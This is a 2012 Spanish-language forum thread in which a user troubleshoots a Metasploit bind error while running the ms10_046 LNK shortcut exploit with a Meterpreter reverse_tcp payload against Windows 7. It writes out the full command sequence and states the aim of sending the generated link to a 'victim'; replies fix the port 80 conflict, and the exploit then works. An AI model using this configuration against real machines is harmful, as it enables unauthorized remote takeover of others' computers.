Título: [Solucionado] Me salta error de permisos en metasploit Publicado por: Dryken en 5 Agosto 2012, 14:43 pm Resulta que al ejecutar el exploit con su payload me salta un error que a simple vista parece que es porque no tengo los permisos necesarios para poder ejecutarlo.
Citar exploit failed: Errno::EACCES permission denied - bind(2) El exploit y el payload que uso son para tomar el control de la shell de windows 7, son estos. Citar use windows/browser/ms10_046_shortcut_icon_dllloader set payload windows/meterpreter/reverse_tcp No sé cúal es el motivo exacto ni como podría solucionarlo, espero que podáis echarme una mano. Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: adastra en 7 Agosto 2012, 09:20 am Con que usuario estas iniciando la consola de metasploit? el problema esta en que no tienes permisos para abrir el puerto.
Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: Dryken en 7 Agosto 2012, 20:17 pm Pues la consola al principio la ejecutaba como usuario normal pero al ver el problema la volví a ejecutar como administrador pero sin resultados, obtenía el mismo mensaje de error referente al permiso de administrador.
Lo único que intento ejecutar es esto... Citar search LNK use windows/browser/ms10_046_shortcut_icon_dllloader show payloads set payload windows/meterpreter/reverse_tcp show options set SRVHOST IP local mia set LHOST IP local mia show options exploit A partir de aquí se supone que debería de generar un enlace para enviárselo a la víctima...pero no lo genera. El tema de ejecutarlo como administardor con lo típico del botón derecho no me da resultados. No sé si será otro fallo el que esté comentiendo, aunque el mensaje es claramnete referente al permiso del admin. Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: adastra en 7 Agosto 2012, 23:36 pm Si mal no recuerdo, el puerto 80 necesita estar disponible (o el 8080) es posible que tengas alguno servidor aparte corriendo en alguno de esos puertos? Este exploit lo que intenta hacer es crear un pequeño servidor web con el payload malicioso, me da la sensación de que el error que te da, es que no puede hacer un "bind" del puerto, ya que esta ocupado.
intenta establecer un valor distinto a la propiedad SRVPORT set SRVPORT 8081 A ver si es eso. Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: Dryken en 8 Agosto 2012, 02:09 am Compañero gracias por la información, lo he probado con con el puerto 8081 y sus derivados pero por lo visto el SRVPORT sólo permite estar establecido en el 80, vamos que no puede cambiarse.
Tampoco deja modificarse el SRVHOST ni el LHOST ya que si coloco otra dirección que no sea mi IP local no va, da más errores que antes. He mirado con el current ports que en el PC el puerto 80 (TCP) está siendo utilizado por 2 procesos del sistema, pero no creo que sea inconveniente el que se esté ejecutando para poder iniciar el exploit. Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: it3r en 8 Agosto 2012, 04:35 am bajate el netcat y pon
nc.exe -lvvp 80 si te sale un error es porque ya hay una conexión que esta escuchandoo en el puerto 80, por lo cual debes cerrar aquella conexión ya que es una sola conexión a la escucha por puerto. saludos Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: adastra en 8 Agosto 2012, 09:16 am Con tu última respuesta has confirmado lo que habia dicho.
Si el puerto 80 ya esta siendo utilizado por otro proceso en el sistema, el servidor necesario para el exploit no puede arrancar. Tienes que detener el proceso que este utilizando dicho puerto y posteriormente iniciar el exploit, hasta que no hagas eso, el servidor para el exploit no te funcionará. Título: Re: [Ayuda] Me salta error de permisos en metasploit Publicado por: Dryken en 8 Agosto 2012, 13:23 pm it3r hacía tiempo que no utilizaba el netcat, lo he vuelto a poner en escucha y llevas toda la razón, me salta este mensaje.
Citar Can´t grab 0.0.0.0:80 with band Tal y como tu y adastra habéis mencionado el problema es exáctamente que el puerto 80 está en uso por esos 2 procesos, vale simplemente quitándolo ya debe de funcionar. Edito Solucionado, el problema era ese, lo he probado y el exploit ya funciona. Muchas gracias por toda la ayuda compañeros! ;) |